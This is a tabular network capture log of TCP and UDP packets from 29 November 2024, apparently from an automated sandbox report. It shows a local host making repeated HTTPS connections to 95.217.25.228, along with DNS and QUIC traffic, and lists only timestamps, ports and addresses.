Nov 29, 2024 12:29:08.691174030 CET	443	49882	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:08.711705923 CET	49882	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:08.711730003 CET	443	49882	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:08.711771011 CET	49882	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:08.711781979 CET	443	49882	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:09.743427038 CET	443	49883	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:09.743561983 CET	49883	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:09.744107962 CET	49883	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:09.744116068 CET	443	49883	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:09.768549919 CET	49883	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:09.768572092 CET	443	49883	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:09.768620968 CET	49883	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:09.768625975 CET	443	49883	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:09.823904991 CET	443	49882	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:09.823977947 CET	443	49882	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:09.824039936 CET	49882	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:09.824099064 CET	49882	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:09.825144053 CET	49882	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:09.825166941 CET	443	49882	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:10.254820108 CET	49884	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:10.254873037 CET	443	49884	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:10.254991055 CET	49884	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:10.255265951 CET	49884	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:10.255275965 CET	443	49884	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:10.879203081 CET	443	49883	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:10.879275084 CET	443	49883	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:10.879359007 CET	49883	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:10.879386902 CET	49883	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:10.880465984 CET	49883	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:10.880484104 CET	443	49883	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:11.260512114 CET	49885	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:11.260560036 CET	443	49885	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:11.260637999 CET	49885	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:11.261051893 CET	49885	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:11.261064053 CET	443	49885	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:11.769355059 CET	443	49884	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:11.769448996 CET	49884	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:11.770400047 CET	49884	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:11.770406961 CET	443	49884	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:11.796633005 CET	49884	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:11.796643972 CET	443	49884	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:11.796664000 CET	49884	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:11.796669960 CET	443	49884	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:12.774014950 CET	443	49885	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:12.774154902 CET	49885	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:12.774826050 CET	49885	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:12.774837971 CET	443	49885	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:12.794042110 CET	49885	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:12.794056892 CET	443	49885	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:12.794089079 CET	49885	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:12.794099092 CET	443	49885	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:12.910197973 CET	443	49884	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:12.910296917 CET	443	49884	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:12.910475016 CET	49884	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:12.911569118 CET	49884	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:12.911592007 CET	443	49884	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:13.271006107 CET	49886	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:13.271045923 CET	443	49886	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:13.271168947 CET	49886	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:13.271486998 CET	49886	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:13.271498919 CET	443	49886	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:13.908235073 CET	443	49885	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:13.908303022 CET	443	49885	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:13.908421993 CET	49885	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:13.908483028 CET	49885	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:13.909728050 CET	49885	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:13.909744978 CET	443	49885	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:14.290462971 CET	49887	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:14.290504932 CET	443	49887	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:14.290574074 CET	49887	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:14.290783882 CET	49887	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:14.290798903 CET	443	49887	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:14.784734011 CET	443	49886	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:14.784970045 CET	49886	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:14.785311937 CET	49886	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:14.785320997 CET	443	49886	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:14.805125952 CET	49886	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:14.805146933 CET	443	49886	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:14.805196047 CET	49886	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:14.805208921 CET	443	49886	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:15.710856915 CET	443	49887	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:15.710995913 CET	49887	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:15.711662054 CET	49887	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:15.711671114 CET	443	49887	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:15.731796026 CET	49887	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:15.731807947 CET	443	49887	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:15.731833935 CET	49887	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:15.731846094 CET	443	49887	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:15.914644003 CET	443	49886	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:15.914731979 CET	443	49886	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:15.914871931 CET	49886	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:15.914902925 CET	49886	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:15.919926882 CET	49886	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:15.919945955 CET	443	49886	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:16.317807913 CET	49888	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:16.317842007 CET	443	49888	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:16.317965031 CET	49888	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:16.318324089 CET	49888	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:16.318339109 CET	443	49888	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:16.828107119 CET	443	49887	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:16.828176975 CET	443	49887	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:16.828265905 CET	49887	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:16.828306913 CET	49887	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:16.829546928 CET	49887	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:16.829566956 CET	443	49887	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:17.327838898 CET	49889	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:17.327882051 CET	443	49889	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:17.327963114 CET	49889	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:17.328241110 CET	49889	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:17.328263044 CET	443	49889	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:17.785309076 CET	443	49888	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:17.785415888 CET	49888	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:17.786067009 CET	49888	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:17.786078930 CET	443	49888	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:17.805902958 CET	49888	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:17.805929899 CET	443	49888	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:17.805979967 CET	49888	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:17.805990934 CET	443	49888	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:18.841480017 CET	443	49889	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:18.841592073 CET	49889	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:18.842225075 CET	49889	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:18.842233896 CET	443	49889	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:18.861118078 CET	49889	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:18.861143112 CET	443	49889	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:18.861160040 CET	49889	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:18.861169100 CET	443	49889	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:18.921634912 CET	443	49888	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:18.921706915 CET	443	49888	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:18.921838045 CET	49888	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:18.923028946 CET	49888	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:18.923028946 CET	49888	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:19.209554911 CET	443	49874	23.57.90.143	192.168.2.8
Nov 29, 2024 12:29:19.209647894 CET	443	49874	23.57.90.143	192.168.2.8
Nov 29, 2024 12:29:19.209706068 CET	49874	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:29:19.236774921 CET	49888	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:19.236824989 CET	443	49888	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:19.349942923 CET	49890	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:19.350007057 CET	443	49890	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:19.350122929 CET	49890	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:19.350388050 CET	49890	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:19.350400925 CET	443	49890	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:19.980629921 CET	443	49889	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:19.980704069 CET	443	49889	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:19.980722904 CET	49889	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:19.980747938 CET	49889	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:19.981746912 CET	49889	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:19.981770992 CET	443	49889	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:20.357484102 CET	49891	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:20.357527018 CET	443	49891	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:20.357597113 CET	49891	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:20.357817888 CET	49891	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:20.357832909 CET	443	49891	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:20.863488913 CET	443	49890	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:20.863599062 CET	49890	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:20.864115953 CET	49890	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:20.864123106 CET	443	49890	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:20.882110119 CET	49890	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:20.882119894 CET	443	49890	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:20.882148027 CET	49890	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:20.882155895 CET	443	49890	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:21.828186989 CET	443	49891	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:21.828454971 CET	49891	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:21.829051971 CET	49891	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:21.829062939 CET	443	49891	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:21.849103928 CET	49891	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:21.849113941 CET	443	49891	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:21.849134922 CET	49891	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:21.849148989 CET	443	49891	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:21.989355087 CET	443	49890	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:21.989432096 CET	49890	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:21.989442110 CET	443	49890	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:21.989495039 CET	49890	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:21.990392923 CET	49890	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:21.990413904 CET	443	49890	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:22.390791893 CET	49892	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:22.390832901 CET	443	49892	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:22.390897036 CET	49892	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:22.391659975 CET	49892	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:22.391674995 CET	443	49892	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:22.966923952 CET	443	49891	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:22.966983080 CET	49891	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:22.967001915 CET	443	49891	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:22.967046976 CET	49891	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:29:23.894249916 CET	443	49892	95.217.25.228	192.168.2.8
Nov 29, 2024 12:29:23.897679090 CET	49892	443	192.168.2.8	95.217.25.228

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2024 12:27:18.088665962 CET	64514	53	192.168.2.8	1.1.1.1
Nov 29, 2024 12:27:18.229232073 CET	53	64514	1.1.1.1	192.168.2.8
Nov 29, 2024 12:27:20.231327057 CET	62210	53	192.168.2.8	1.1.1.1
Nov 29, 2024 12:27:20.632962942 CET	53	62210	1.1.1.1	192.168.2.8
Nov 29, 2024 12:27:39.397964001 CET	53	63048	1.1.1.1	192.168.2.8
Nov 29, 2024 12:27:39.442994118 CET	53	51542	1.1.1.1	192.168.2.8
Nov 29, 2024 12:27:39.460747957 CET	63607	53	192.168.2.8	1.1.1.1
Nov 29, 2024 12:27:39.460927010 CET	62066	53	192.168.2.8	1.1.1.1
Nov 29, 2024 12:27:39.600445986 CET	53	63607	1.1.1.1	192.168.2.8
Nov 29, 2024 12:27:39.600570917 CET	53	62066	1.1.1.1	192.168.2.8
Nov 29, 2024 12:27:42.170749903 CET	53	55146	1.1.1.1	192.168.2.8
Nov 29, 2024 12:27:53.767076969 CET	64144	53	192.168.2.8	1.1.1.1
Nov 29, 2024 12:27:53.767240047 CET	57016	53	192.168.2.8	1.1.1.1
Nov 29, 2024 12:27:53.911984921 CET	53	57016	1.1.1.1	192.168.2.8
Nov 29, 2024 12:27:56.057786942 CET	58903	53	192.168.2.8	1.1.1.1
Nov 29, 2024 12:27:56.057940006 CET	59457	53	192.168.2.8	1.1.1.1
Nov 29, 2024 12:27:57.044857025 CET	54159	53	192.168.2.8	1.1.1.1
Nov 29, 2024 12:27:57.045017958 CET	53982	53	192.168.2.8	1.1.1.1
Nov 29, 2024 12:27:57.184724092 CET	53	54159	1.1.1.1	192.168.2.8
Nov 29, 2024 12:27:57.291213036 CET	53	53982	1.1.1.1	192.168.2.8
Nov 29, 2024 12:27:58.530965090 CET	58530	53	192.168.2.8	1.1.1.1
Nov 29, 2024 12:27:58.531459093 CET	52609	53	192.168.2.8	1.1.1.1
Nov 29, 2024 12:27:58.531980991 CET	49734	53	192.168.2.8	1.1.1.1
Nov 29, 2024 12:27:58.532144070 CET	61161	53	192.168.2.8	1.1.1.1
Nov 29, 2024 12:27:58.635548115 CET	63916	53	192.168.2.8	1.1.1.1
Nov 29, 2024 12:27:58.635986090 CET	62164	53	192.168.2.8	1.1.1.1
Nov 29, 2024 12:27:58.671083927 CET	53	58530	1.1.1.1	192.168.2.8
Nov 29, 2024 12:27:58.671921968 CET	53	52609	1.1.1.1	192.168.2.8
Nov 29, 2024 12:27:58.672152042 CET	53	49734	1.1.1.1	192.168.2.8
Nov 29, 2024 12:27:58.672885895 CET	53	61161	1.1.1.1	192.168.2.8
Nov 29, 2024 12:27:58.775064945 CET	53	63916	1.1.1.1	192.168.2.8
Nov 29, 2024 12:27:58.775695086 CET	53	62164	1.1.1.1	192.168.2.8
Nov 29, 2024 12:27:59.281112909 CET	61169	53	192.168.2.8	1.1.1.1
Nov 29, 2024 12:27:59.281464100 CET	54774	53	192.168.2.8	1.1.1.1
Nov 29, 2024 12:27:59.303028107 CET	64021	53	192.168.2.8	1.1.1.1
Nov 29, 2024 12:27:59.303179979 CET	63844	53	192.168.2.8	1.1.1.1
Nov 29, 2024 12:27:59.421984911 CET	53	61169	1.1.1.1	192.168.2.8
Nov 29, 2024 12:27:59.422060013 CET	53	54774	1.1.1.1	192.168.2.8
Nov 29, 2024 12:27:59.424503088 CET	56518	53	192.168.2.8	1.1.1.1
Nov 29, 2024 12:27:59.424669027 CET	57992	53	192.168.2.8	1.1.1.1
Nov 29, 2024 12:27:59.567317963 CET	53	57992	1.1.1.1	192.168.2.8
Nov 29, 2024 12:27:59.573692083 CET	63110	53	192.168.2.8	1.1.1.1
Nov 29, 2024 12:27:59.573858023 CET	65231	53	192.168.2.8	1.1.1.1
Nov 29, 2024 12:27:59.716089964 CET	53	65231	1.1.1.1	192.168.2.8
Nov 29, 2024 12:28:00.968570948 CET	58266	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:01.269562006 CET	58266	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:01.333796978 CET	62898	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:01.643656015 CET	62898	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:01.881078959 CET	58266	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:02.110203028 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:02.110258102 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:02.110265970 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:02.110536098 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:02.111408949 CET	58266	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:02.113310099 CET	58266	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:02.118331909 CET	58266	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:02.213874102 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:02.249021053 CET	62898	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:02.446527004 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:02.446639061 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:02.446644068 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:02.446647882 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:02.447221041 CET	58266	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:02.447540045 CET	58266	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:02.450795889 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:02.474335909 CET	443	62898	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:02.474376917 CET	443	62898	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:02.474384069 CET	443	62898	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:02.474498987 CET	443	62898	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:02.475255013 CET	62898	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:02.476596117 CET	62898	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:02.485893965 CET	62898	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:02.581496000 CET	443	62898	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:02.779763937 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:02.809142113 CET	443	62898	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:02.809259892 CET	443	62898	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:02.809263945 CET	443	62898	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:02.809267998 CET	443	62898	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:02.812371016 CET	62898	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:02.812676907 CET	62898	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:02.819454908 CET	443	62898	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:02.839829922 CET	443	62898	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:02.847954988 CET	443	62898	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:02.883814096 CET	62898	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:02.891330004 CET	58266	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:03.144889116 CET	443	62898	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:03.212280989 CET	62898	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:04.644603968 CET	138	138	192.168.2.8	192.168.2.255
Nov 29, 2024 12:28:04.674489021 CET	58266	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:04.675820112 CET	58266	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:04.700710058 CET	58266	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:04.701075077 CET	58266	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:05.008181095 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:05.008884907 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:05.009169102 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:05.009443045 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:05.012871027 CET	58266	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:05.014197111 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:05.014799118 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:05.034609079 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:05.035341978 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:05.036499023 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:05.036664963 CET	58266	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:05.324166059 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:05.324851990 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:05.927083015 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:05.927136898 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:06.109091043 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.110109091 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.110161066 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.110173941 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.110261917 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.110459089 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:06.112543106 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:06.112755060 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:06.157310009 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.163821936 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.163877010 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.163888931 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.163999081 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.164211988 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:06.164640903 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:06.164851904 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:06.164941072 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:06.251554012 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.268127918 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.278839111 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:06.279269934 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:06.281868935 CET	58266	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:06.282027006 CET	58266	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:06.437892914 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.437907934 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.437964916 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.437974930 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.437984943 CET	443	59729	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.438314915 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:06.438466072 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:06.475068092 CET	59729	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:06.497807980 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.497855902 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.498050928 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.498063087 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.498073101 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.498083115 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.498375893 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:06.498514891 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:06.512109041 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.512548923 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:06.516129971 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.516557932 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:06.525593042 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.535238028 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.539413929 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:06.543618917 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:06.551851988 CET	443	62648	23.209.72.43	192.168.2.8
